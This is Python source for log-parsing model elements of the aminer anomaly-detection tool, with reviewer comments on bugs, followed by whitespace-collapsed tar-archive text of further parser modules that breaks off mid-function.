        take effect when the first timestamp to be parsed by this object is also semi qualified. Otherwise, the year information is
        extracted from this record. When empty and first parsing invocation involves a semi qualified date, the current year in UTC
        timezone is used.
        @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current time of
        values has to be tracked. This value defines the window within that the time may jump between two matches. When not within that
        window, the value is still parsed, corrected to the most likely value but does not change the detection year.
        @raise ValueError when date_formats is empty, a tuple does not have exactly 3 elements, text_locale is an empty string, or a
        format string starts with the format string of an earlier entry (the earlier, shorter format would always win).
        @raise TypeError when an entry of date_formats is not a tuple.
        """
        super().__init__(element_id, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds)
        if len(date_formats) == 0:
            msg = "At least one date_format must be specified."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        format_has_year_flag = False
        # Remember the locale active before the DateTimeModelElements are created so it can be restored below.
        # NOTE(review): locale.getdefaultlocale() and locale.resetlocale() are deprecated since Python 3.11 (resetlocale is gone in
        # 3.13); this constructor will need a different restore strategy on newer interpreters.
        default_locale = locale.getdefaultlocale()
        self.date_time_model_elements: List[DateTimeModelElement] = []
        for i, date_format in enumerate(date_formats):
            if not isinstance(date_format, tuple):
                msg = "date_format must be of type tuple."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(date_format) != 3:
                msg = "date_format consist of 3 elements."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            date_format, time_zone, text_locale = date_format
            if isinstance(text_locale, str) and len(text_locale) < 1:
                msg = "empty text_locale is not allowed."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            # Formats are tried in list order, so a format that merely extends an earlier one could never be reached.
            for date_time_model_element in self.date_time_model_elements:
                if date_format.startswith(date_time_model_element.date_format):
                    msg = f"Invalid order of date_formats. {date_format.decode()} starts with " \
                          f"{date_time_model_element.date_format.decode()}. More specific datetimes would be skipped."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)
            self.date_time_model_elements.append(DateTimeModelElement(
                element_id + "/format" + str(i), date_format, time_zone, text_locale, start_year, max_time_jump_seconds))
            # NOTE(review): this starts at False and is combined with "and", so it can never become True whatever the formats contain;
            # the start_year branch below therefore always falls back to the current UTC year when start_year is None. Possibly "or"
            # (or all()) was intended -- confirm against the unit tests before changing.
            format_has_year_flag = format_has_year_flag and self.date_time_model_elements[-1].format_has_year_flag
        # The latest parsed timestamp value. (Not read anywhere in this class; presumably consumed by callers -- verify.)
        self.latest_parsed_timestamp = None
        # Restore previous locale settings. There seems to be no way in python to get back to the exact same state. Hence, perform the
        # reset only when locale has changed. This would also change the locale from (None, None) to some system-dependent locale.
        if locale.getlocale() != default_locale:
            locale.resetlocale()
        if (not format_has_year_flag) and (start_year is None):
            self.start_year = time.gmtime(None).tm_year
        elif start_year is None:
            # this is needed so start_year is at any point an integer. (instead of being None)
            self.start_year = 0
        # Seconds since epoch of the last successful match; 0 means "nothing parsed yet" for the year wraparound logic.
        self.last_parsed_seconds = 0

    def get_match_element(self, path: str, match_context):
        """Check if the data to match within the content is suitable to be parsed by any of the supplied date formats.
        The formats are tried in configuration order. Before each attempt the process-wide locale is switched to the format's
        text_locale (locale.setlocale raises locale.Error for a locale that is not installed; this is not caught here) and the shared
        year/last-timestamp state of this element is pushed into the child element, so that year wraparound tracking spans all formats.
        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed.
        @return On match return the MatchElement produced by the first matching DateTimeModelElement (its match object is the seconds
        since 1970). When not matching, None is returned. When the timestamp data parsed would be far off from the last ones parsed,
        so that correction may not be applied correctly, then the method will also return None.
        """
        for i, date_time_model_element in enumerate(self.date_time_model_elements):
            # Process-global side effect, never reverted: see the class docstring.
            locale.setlocale(locale.LC_ALL, date_time_model_element.text_locale)
            self.date_time_model_elements[i].last_parsed_seconds = self.last_parsed_seconds
            self.date_time_model_elements[i].start_year = self.start_year
            match_element = date_time_model_element.get_match_element(path, match_context)
            if match_element is not None:
                # Pull the (possibly advanced) year and timestamp state back so the next format sees it too.
                self.last_parsed_seconds = date_time_model_element.last_parsed_seconds
                self.start_year = date_time_model_element.start_year
                return match_element
        return None
class DebugModelElement(ModelElementInterface):
    """Model element that matches zero bytes at any position and dumps the parser state for inspection.

    Because the match is always empty it can never fail and can be placed anywhere in the parsing tree where matching itself does not
    alter the parsing flow (see e.g. FirstMatchModelElement). Each invocation writes the current path and the still unmatched data to
    the debug logger and to stderr, so raw log content ends up in those outputs -- keep it out of production configurations.
    """

    def __init__(self, element_id: str):
        """Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
        """
        super().__init__(element_id)
        # Announce every instantiation so a forgotten debug element is visible in production logs.
        self._report(f"DebugModelElement {element_id} added")

    @staticmethod
    def _report(message: str):
        """Write message to the debug logger at info level and echo it to stderr."""
        logging.getLogger(DEBUG_LOG_NAME).info(message)
        print(message, file=sys.stderr)

    def get_match_element(self, path: str, match_context):
        """Report the current state and return an empty match.
        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed; its match_data is printed but not consumed.
        @return Always a MatchElement covering zero bytes.
        """
        self._report(f'DebugModelElement path = "{path}/{self.element_id}", unmatched = "{repr(match_context.match_data)}"')
        return MatchElement(f"{path}/{self.element_id}", b"", b"", None)
class DecimalFloatValueModelElement(ModelElementInterface):
    """This class defines a model to parse decimal values with optional signum, padding or exponent.
    With padding, the signum has to be found before the padding characters.
    The accepted byte sequence is: [sign][padding][digits][.digits][e|E[sign]digits]; which of the optional parts are allowed is
    controlled by the constructor arguments.
    """

    SIGN_TYPE_NONE = "none"
    SIGN_TYPE_OPTIONAL = "optional"
    SIGN_TYPE_MANDATORY = "mandatory"

    PAD_TYPE_NONE = "none"
    PAD_TYPE_ZERO = "zero"
    PAD_TYPE_BLANK = "blank"

    EXP_TYPE_NONE = "none"
    EXP_TYPE_OPTIONAL = "optional"
    EXP_TYPE_MANDATORY = "mandatory"

    def __init__(self, element_id: str, value_sign_type: str = SIGN_TYPE_NONE, value_pad_type: str = PAD_TYPE_NONE,
                 exponent_type: str = EXP_TYPE_NONE) -> None:
        """Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed, with
        SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -.
        @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is allowed,
        PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value.
        @param exponent_type defines the allowed types of exponential values. With EXP_TYPE_NONE no exponential values are allowed,
        EXP_TYPE_OPTIONAL allows exponential values and with EXP_TYPE_MANDATORY every value must contain exponential values.
        """
        # self.start_characters and self.pad_characters used below are derived from these arguments in the base class (not visible
        # here); no validation of the *_type values happens in this constructor, unlike DecimalIntegerValueModelElement.
        super().__init__(element_id, value_sign_type=value_sign_type, value_pad_type=value_pad_type, exponent_type=exponent_type)
        self.digits = set(b"0123456789")

    def get_match_element(self, path: str, match_context):
        """Find the maximum number of bytes forming a decimal number according to the parameters specified.
        Only sign, padding, digits, "." and "e"/"E" bytes are ever consumed, so the float() conversions at the end are not expected to
        raise; they are not guarded by try/except though.
        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed.
        @return a match when at least one byte being a digit was found, None otherwise. The match object is the parsed float value.
        """
        data = match_context.match_data
        if not data or (data[0] not in self.start_characters):
            return None
        match_len = 1
        # Without padding a leading zero may only be followed by a decimal point, never by another digit (rejects "007").
        if self.pad_characters == b"" and data.startswith(b"0") and not data.startswith(b"0.") and len(data) > 1 and \
                data[1] in self.digits:
            return None
        # Skip the padding bytes following the (optional) sign.
        for test_byte in data[match_len:]:
            if test_byte not in self.pad_characters:
                break
            match_len += 1
        num_start_pos = match_len
        # Consume the integer digits.
        for test_byte in data[match_len:]:
            if test_byte not in self.digits:
                break
            match_len += 1
        if match_len == 1:
            # Exactly one byte consumed: it must itself be a digit (a lone sign is no number).
            if data[0] not in self.digits:
                return None
        elif num_start_pos == match_len and match_len == 1:
            # NOTE(review): unreachable -- match_len == 1 is already handled by the branch above.
            # only return None if match_len is 1 to allow 00 with zero padding.
            return None
        # See if there is decimal part after decimal point.
        if (match_len < len(data)) and (chr(data[match_len]) == "."):
            match_len += 1
            post_point_start = match_len
            for test_byte in data[match_len:]:
                if test_byte not in self.digits:
                    break
                match_len += 1
            if match_len == post_point_start - 1:
                # There has to be at least one digit after the decimal point.
                # NOTE(review): match_len is never smaller than post_point_start here, so this check cannot fire; a trailing "." with
                # no digits (e.g. b"12.") is currently accepted and float(b"12.") yields 12.0. Confirm whether that is intended.
                return None
        # See if there could be any exponent following the number.
        # The "match_len + 1 < len(data)" guard guarantees that at least one byte follows the e/E, so the index below is in range.
        if (self.exponent_type != DecimalFloatValueModelElement.EXP_TYPE_NONE) and (match_len + 1 < len(data)) and (
                data[match_len] in b"eE"):
            match_len += 1
            if data[match_len] in b"+-":
                match_len += 1
            exp_number_start = match_len
            for test_byte in data[match_len:]:
                if test_byte not in self.digits:
                    break
                match_len += 1
            if match_len == exp_number_start:
                # No exponent number found.
                return None
        elif self.exponent_type == DecimalFloatValueModelElement.EXP_TYPE_MANDATORY:
            return None
        match_string = data[:match_len]
        if self.pad_characters == b" " and match_string[0] in b"+-":
            # With blank padding and a sign, float() cannot parse "+ 5" directly: drop the first blank, but refuse more than one,
            # because the remaining blanks would otherwise be swallowed silently by float().
            if b" " in match_string.replace(b" ", b"", 1):
                return None
            match_value = float(match_string.replace(b" ", b"", 1))
        else:
            match_value = float(match_string)
        match_context.update(match_string)
        return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None)
class DecimalIntegerValueModelElement(ModelElementInterface):
    """Model element parsing an integer value with optional signum and optional padding.

    When both are present, the signum has to come before the padding characters.
    """

    SIGN_TYPE_NONE = "none"
    SIGN_TYPE_OPTIONAL = "optional"
    SIGN_TYPE_MANDATORY = "mandatory"

    PAD_TYPE_NONE = "none"
    PAD_TYPE_ZERO = "zero"
    PAD_TYPE_BLANK = "blank"

    def __init__(self, element_id: str, value_sign_type: str = SIGN_TYPE_NONE, value_pad_type: str = PAD_TYPE_NONE):
        """Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed, with
        SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -.
        @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is allowed,
        PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value.
        @raise ValueError when value_sign_type or value_pad_type is not one of the class constants.
        """
        super().__init__(element_id, value_sign_type=value_sign_type, value_pad_type=value_pad_type)
        cls = DecimalIntegerValueModelElement
        allowed_sign_types = (cls.SIGN_TYPE_NONE, cls.SIGN_TYPE_OPTIONAL, cls.SIGN_TYPE_MANDATORY)
        allowed_pad_types = (cls.PAD_TYPE_NONE, cls.PAD_TYPE_ZERO, cls.PAD_TYPE_BLANK)
        if value_sign_type not in allowed_sign_types:
            msg = f"Invalid value_sign_type {value_sign_type}"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if value_pad_type not in allowed_pad_types:
            msg = f"Invalid value_pad_type {value_pad_type}"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.digits = set(b"0123456789")

    def get_match_element(self, path: str, match_context):
        """Find the maximum number of bytes forming a integer number according to the parameters specified.
        The consumed bytes are [sign][padding][digits]; self.start_characters and self.pad_characters come from the base class.
        @param path to be printed in the MatchElement.
        @param match_context the match_context to be analyzed.
        @return a match when at least one byte being a digit was found, None otherwise. The match object is the int value.
        """
        data = match_context.match_data
        if not data or data[0] not in self.start_characters:
            return None
        # Without padding, a leading zero directly followed by another digit is not a plain integer (rejects "007").
        if self.pad_characters == b"" and len(data) > 1 and data.startswith(b"0") and not data.startswith(b"0.") \
                and data[1] in self.digits:
            return None
        pos = 1
        # Skip padding after the optional sign, then consume the digits.
        while pos < len(data) and data[pos] in self.pad_characters:
            pos += 1
        while pos < len(data) and data[pos] in self.digits:
            pos += 1
        # A single consumed byte has to be a digit itself; a lone sign or pad byte is no number.
        if pos == 1 and data[0] not in self.digits:
            return None
        match_string = data[:pos]
        numeric_text = match_string
        if self.pad_characters == b" " and match_string[0] in b"+-":
            # int() does not accept a blank between sign and digits, so drop the first one.
            numeric_text = match_string.replace(b" ", b"", 1)
        try:
            match_value = int(numeric_text)
        except ValueError:
            # Covers a remaining blank after the sign as well as the interpreter's digit-count limit for very long numbers.
            return None
        match_context.update(match_string)
        return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None)
class ElementValueBranchModelElement(ModelElementInterface):
    """This class defines an element that selects a branch path based on a previous model value.
    First value_model is matched, then the match object found at value_path below that match is looked up in branch_model_dict, and the
    model element found there (or default_branch) is matched against the remaining data.
    """

    def __init__(self, element_id: str, value_model: ModelElementInterface, value_path: Union[str, None], branch_model_dict: dict,
                 default_branch: Union[str, int] = None) -> None:
        """Create the branch model element.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param value_model the ModelElement which has to match the data.
        @param value_path the relative path to the target value from the value_model element on. When the path does not resolve to a
        value, this model element will not match. A path value of None indicates, that the match element of the value_model should be
        used directly.
        @param branch_model_dict a dictionary to select a branch for the value identified by valuePath.
        @param default_branch when lookup in branch_model_dict fails, use this as default branch or fail when None.
        NOTE(review): get_match_element calls default_branch.get_match_element(), i.e. it is used as a model element, although the
        annotation says Union[str, int] -- confirm which one is meant.
        """
        # Set before the base constructor runs; presumably the base class validates the other arguments and needs this one -- verify.
        self.value_path = value_path
        super().__init__(
            element_id, value_model=value_model, value_path=value_path, branch_model_dict=branch_model_dict, default_branch=default_branch)

    def get_match_element(self, path: str, match_context):
        """Try to find a match on given data for the test model and the selected branch.
        @param path the model path to the parent model element invoking this method.
        @param match_context an instance of MatchContext class holding the data context to match against.
        @return the matchElement or None if the test model did not match, no branch was selected or the branch did not match.
        """
        current_path = f"{path}/{self.element_id}"
        start_data = match_context.match_data
        model_match = self.value_model.get_match_element(current_path, match_context)
        if model_match is None:
            return None
        # Now extract the test path value from the model_match. From here on, the matchContext is already modified so we must NEVER just
        # return but revert the changes in the context first.
        remaining_value_path = self.value_path
        test_match = model_match
        current_test_path = test_match.get_path()
        # Walk value_path one "/"-separated component at a time, descending into the child whose path matches the path built so far.
        while remaining_value_path is not None:
            next_part_pos = remaining_value_path.find('/')
            if next_part_pos <= 0:
                # Last component (no further "/"; a leading "/" is treated the same way and ends the walk).
                current_test_path += '/' + remaining_value_path
                remaining_value_path = None
            else:
                current_test_path += '/' + remaining_value_path[:next_part_pos]
                remaining_value_path = remaining_value_path[next_part_pos + 1:]
            match_children = test_match.get_children()
            test_match = None
            if match_children is None:
                break
            for child in match_children:
                if child.get_path() == current_test_path:
                    test_match = child
                    break
        branch_match = None
        if test_match is not None:
            if isinstance(test_match.get_match_object(), bytes):
                # NOTE(review): decode() raises UnicodeDecodeError for bytes that are not valid in AminerConfig.ENCODING; that
                # exception propagates without the match_data revert below, contradicting the invariant stated above. Whether the
                # value bytes can ever be invalid depends on the value_model -- verify.
                branch_model = self.branch_model_dict.get(test_match.get_match_object().decode(AminerConfig.ENCODING), self.default_branch)
            else:
                branch_model = self.branch_model_dict.get(test_match.get_match_object(), self.default_branch)
            if branch_model is not None:
                branch_match = branch_model.get_match_element(current_path, match_context)
        if branch_match is None:
            # Undo whatever value_model (and a failed branch) consumed.
            match_context.match_data = start_data
            return None
        # The matched string is everything consumed by value_model plus the branch.
        return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)],
                            start_data[:len(start_data) - len(match_context.match_data)], [model_match, branch_match])
class FirstMatchModelElement(ModelElementInterface):
    """Model element returning the match of the first child in the configured list that accepts the data.

    Children are tried strictly in list order, so an earlier child shadows every later one that would also have matched.
    """

    def __init__(self, element_id: str, children: list):
        """Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param children a list of child elements to be iterated through.
        """
        super().__init__(element_id, children=children)

    def get_match_element(self, path: str, match_context):
        """Try each child in order and return its match.
        When no child matches, match_context.match_data is reset to the value it had on entry.
        @return None when there is no match, MatchElement otherwise.
        """
        child_path = f"{path}/{self.element_id}"
        saved_data = match_context.match_data
        attempts = (child.get_match_element(child_path, match_context) for child in self.children)
        result = next((match for match in attempts if match is not None), None)
        if result is None:
            match_context.match_data = saved_data
        return result
class FixedDataModelElement(ModelElementInterface):
    """Model element matching one fixed byte string.

    The element matches when fixed_data is found exactly at the current position in the log atom.
    """

    def __init__(self, element_id: str, fixed_data: bytes):
        """Initialize the ModelElement.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param fixed_data the exact byte string that has to appear at the current position.
        """
        super().__init__(element_id, fixed_data=fixed_data)

    def get_match_element(self, path: str, match_context):
        """@return None when there is no match, MatchElement otherwise (matched string and match object are both fixed_data)."""
        expected = self.fixed_data
        if match_context.match_data[:len(expected)] != expected:
            return None
        match_context.update(expected)
        return MatchElement(f"{path}/{self.element_id}", expected, expected, None)
class FixedWordlistDataModelElement(ModelElementInterface):
    """Model element detecting one of a fixed list of words at the current position.

    The match object is the index of the matched word in wordlist, so the order of the list matters. The list must not contain a word
    that is a prefix of a later word, because the earlier (shorter) word would always win and the longer one could never be matched.
    """

    def __init__(self, element_id: str, wordlist: list):
        """Create the model element.
        @param element_id an identifier for the ModelElement which is shown in the path.
        @param wordlist the list of words to search for. If it does not fulfill the sorting criteria mentioned in the class
        documentation, an Exception will be raised.
        """
        super().__init__(element_id, wordlist=wordlist)

    def get_match_element(self, path: str, match_context):
        """@return None when there is no match, MatchElement otherwise; the match object is the word's index in wordlist."""
        data = match_context.match_data
        for word_index, word in enumerate(self.wordlist):
            if data.startswith(word):
                match_context.update(word)
                return MatchElement(f"{path}/{self.element_id}", word, word_index, None)
        return None
See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer import AminerConfig class HexStringModelElement(ModelElementInterface): """This class just tries to strip off as many hex bytes as possible from a given data string.""" def __init__(self, element_id: str, upper_case: bool = False): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param upper_case if True, the letters of the hex alphabet are uppercase, otherwise they are lowercase. """ super().__init__(element_id, upper_case=upper_case) def get_match_element(self, path: str, match_context): """Find the maximum number of bytes forming a integer number according to the parameters specified. @return a match when at least one byte being a digit was found """ m = self.hex_regex.match(match_context.match_data) if m is None: return None match_len = m.span(0)[1] match_object = match_context.match_data[:match_len] try: pad = "" if len(match_object.decode(AminerConfig.ENCODING)) % 2 != 0: pad = "0" match_string = bytes.fromhex(pad + match_object.decode(AminerConfig.ENCODING)) except ValueError: return None match_context.update(match_object) return MatchElement(f"{path}/{self.element_id}", match_string, match_object, None) IpAddressDataModelElement.py000066400000000000000000000116771500476301700361200ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that represents an IP address. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import re from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class IpAddressDataModelElement(ModelElementInterface): """This class defines a model element that matches an IP address.""" def __init__(self, element_id: str, ipv6: bool = False): """Create an element to match IP addresses. @param element_id an identifier for the ModelElement which is shown in the path. @param ipv6 if True, IPv6 addresses are parsed, IPv4 addresses are parsed otherwise. """ super().__init__(element_id, ipv6=ipv6) if not ipv6: # self.regex = re.compile(br"((2[0-4][0-9]|1[0-9][0-9]|25[0-5]|[1-9]?[0-9])\.){3}(2[0-4][0-9]|1[0-9][0-9]|25[0-5]|[1-9]?[0-9])") # use a simpler regex to improve the performance. self.regex = re.compile(br"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}") self.extract = extract_ipv4_address else: # modified regex from https://community.helpsystems.com/forums/intermapper/miscellaneous-topics/ # 5acc4fcf-fa83-e511-80cf-0050568460e4?_ga=2.113564423.1432958022.1523882681-2146416484.1523557976 i4 = br"((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})" self.regex = re.compile( br"((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|"+i4+br"|:))|(([0-9A-Fa-f]{1,4}:" br"){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:"+i4+br"|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?" 
br":"+i4+br")|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:"+i4+br")|:))|(([0-9A-Fa-f]{" br"1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:"+i4+br")|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{" br"1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:"+i4+br")|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:"+i4+br")|:" br")))(%.+)?") self.extract = extract_ipv6_address def get_match_element(self, path: str, match_context): """Read an IP address at the current data position. When found, the match_object will be. Allowed formats for IPv6 addresses are defined in RFC4291 section 2.2. However, trailing IPv4 addresses (for example ::FFFF:129.144.52.38) are not allowed. """ data = match_context.match_data m = self.regex.match(data) if m is None: return None match_len = m.span(0)[1] if self.extract is extract_ipv6_address and (b"." in m.group()[:match_len].split(b":")[-1] or (len(data) > match_len and ( re.compile(br"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}").match(data[data.rfind(b":", 0, match_len) + 1:]) is not None or ( data.find(b"::", match_len) == match_len and b"::" in data)))): return None extracted_address = self.extract(m.group(), match_len) if extracted_address is None: return None match_string = data[:match_len] match_context.update(match_string) return MatchElement(f"{path}/{self.element_id}", match_string, extracted_address, None) def extract_ipv4_address(data: bytes, match_len: int): """Calculate integer values from ipv4 addresses.""" numbers = [int(number) for number in data[:match_len].split(b".")] for number in numbers: if number > 255: return None return (numbers[0] << 24) + (numbers[1] << 16) + (numbers[2] << 8) + numbers[3] def extract_ipv6_address(data: bytes, match_len: int): """Calculate integer values from ipv6 addresses.""" parts = data[:match_len].split(b":") if b"" in parts: index = parts.index(b"") # addresses can start or end with ::. Handle this special case. 
parts = [number for number in parts if number != b""] parts = parts[:index] + [b"0"] * (8 - len(parts)) + parts[index:] numbers = [int(b"0x" + number, 16) for number in parts] for number in numbers: if number > 65535: return None return (numbers[0] << 112) + (numbers[1] << 96) + (numbers[2] << 80) + (numbers[3] << 64) + (numbers[4] << 48) + (numbers[5] << 32)\ + (numbers[6] << 16) + (numbers[7]) JsonModelElement.py000066400000000000000000000712651500476301700343600ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that takes any string up to a specific delimiter string. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import warnings import logging from typing import List, Union, Any from json import JSONDecodeError from aminer.parsing.MatchElement import MatchElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.AminerConfig import DEBUG_LOG_NAME warnings.filterwarnings("ignore", category=DeprecationWarning) debug_log_prefix = "JsonModelElement: " def format_float(val): """This function formats the float-value and parses the sign and the exponent.""" exp = None if "e" in val: exp = "e" elif "E" in val: exp = "E" if "+" in val: sign = "+" else: sign = "-" if exp is not None: pos_point = val.find(exp) if "." 
in val: pos_point = val.find(".") if len(val) - val.find(sign) <= 2: format_val = format(float(val), f"1.{val.find(exp) - pos_point}E") return format_val[:-2] + format_val[-1] return format(float(val), f"1.{val.find(exp) - pos_point}E") return float(val) class JsonModelElement(ModelElementInterface): """Parse single- or multi-lined JSON data.""" def __init__(self, element_id: str, key_parser_dict: dict, optional_key_prefix: str = "optional_key_", nullable_key_prefix: str = "+", allow_all_fields: bool = False): """Initialize the JsonModelElement. @param element_id: The ID of the element. @param key_parser_dict: A dictionary of all keys with the according parsers. If a key should be optional, the associated parser must start with the OptionalMatchModelElement. To allow every key in a JSON object use "key": "ALLOW_ALL". To allow only empty arrays - [] - use "key": "EMPTY_ARRAY". To allow only empty objects - {} - use "key": "EMPTY_OBJECT". To allow only empty strings - "" - use "key": "EMPTY_STRING". To allow all keys in an object for a parser use "ALLOW_ALL_KEYS": parser. To allow only null values use "key": "NULL_OBJECT". @param optional_key_prefix: If some key starts with the optional_key_prefix it will be considered optional. @param nullable_key_prefix: The value of this key may be null instead of any expected value. @param allow_all_fields: Unknown fields are skipped without parsing with any parsing model. """ super().__init__(element_id, key_parser_dict=key_parser_dict, optional_key_prefix=optional_key_prefix, nullable_key_prefix=nullable_key_prefix, allow_all_fields=allow_all_fields) self.dec_escapes = False self.validate_key_parser_dict(key_parser_dict) def validate_key_parser_dict(self, dictionary: dict): """Validate the key_parser_dict.""" for value in dictionary.values(): if isinstance(value, ModelElementInterface): continue if isinstance(value, list): if len(value) == 0: msg = "lists in key_parser_dict must have at least one entry." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for v in value: if isinstance(v, dict): self.validate_key_parser_dict(v) elif isinstance(value, dict): self.validate_key_parser_dict(value) elif value not in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "EMPTY_STRING", "ALLOW_ALL_KEYS", "NULL_OBJECT"): msg = "wrong type found in key_parser_dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def is_ascii(self, text: str): """Check if the text contains only ascii characters.""" try: text.encode("ascii") return True except UnicodeEncodeError: return False def get_full_key(self, key, dictionary): """Find the full key in the dictionary.""" options = [self.optional_key_prefix + self.nullable_key_prefix + key, self.nullable_key_prefix + self.optional_key_prefix + key, self.optional_key_prefix + key, self.nullable_key_prefix + key] for option in options: if option in dictionary: return option return key def get_stripped_key(self, key): """Return the key without optional_key_prefix and nullable_key_prefix.""" if key.startswith(self.optional_key_prefix): key = key[len(self.optional_key_prefix):] if key.startswith(self.nullable_key_prefix): key = key[len(self.nullable_key_prefix):] if key.startswith(self.optional_key_prefix): key = key[len(self.optional_key_prefix):] return key def is_nullable_key(self, key): """Check if the key is nullable.""" return key.startswith(self.nullable_key_prefix) or ( key.startswith(self.optional_key_prefix) and key[len(self.optional_key_prefix):].startswith(self.nullable_key_prefix)) def get_unescaped_quotes(self, data): quotes = [i for i in range(len(data)) if data.startswith(b"\"", i)] result_quotes = [] for quote in quotes: if bytes([data[quote - 1]]) != b"\\": result_quotes.append(quote) return result_quotes def index_is_in_json_string(self, quotes, index): """Check if index is in json string.""" for i in range(len(quotes)-1): if quotes[i] < index < quotes[i+1] and i % 2 == 0: return True return False def 
get_match_element(self, path: str, match_context): """Try to parse all the match_context against JSON. When a match is found, the match_context is updated accordingly. @param path the model path to the parent model element invoking this method. @param match_context an instance of MatchContext class holding the data context to match against. @return the matchElement or None if model did not match. """ current_path = f"{path}/{self.element_id}" old_match_data = match_context.match_data matches: Union[List[Union[MatchElement, None]]] = [] try: index = 0 # There can be a valid case in which the text contains for example \x2d, \\x2d or \\\\x2d, which basically should be decoded # into the unicode form. while index != -1: index = match_context.match_data.find(rb"\x") if index != -1: try: match_context.match_data = match_context.match_data.decode("unicode-escape").encode() except UnicodeDecodeError: break index = 0 quotes = self.get_unescaped_quotes(match_context.match_data) while index != -1: index = match_context.match_data.find(b"\\", index) if index != -1 and len(match_context.match_data) - 1 > index and match_context.match_data[ index + 1] not in b"\\'\"abfnrtv/": match_context.match_data = match_context.match_data[:index] + b"\\" + match_context.match_data[index:] index += 2 elif index != -1: index += 2 for num in b"\n\r\t": index = 0 char = bytes([num]) while index != -1: index = match_context.match_data.find(char, index) if index != -1 and len(match_context.match_data) - 1 > index and self.index_is_in_json_string(quotes, index): escaped = (bytes([match_context.match_data[index]]).replace(b"\n", b"\\n").replace(b"\t", b"\\t")) match_context.match_data = match_context.match_data[:index] + escaped + match_context.match_data[index + 1:] index += 2 elif index != -1: index += 2 logging.getLogger(DEBUG_LOG_NAME).debug(repr(match_context.match_data)) json_match_data = json.loads(match_context.match_data, parse_float=format_float) if not isinstance(json_match_data, dict): 
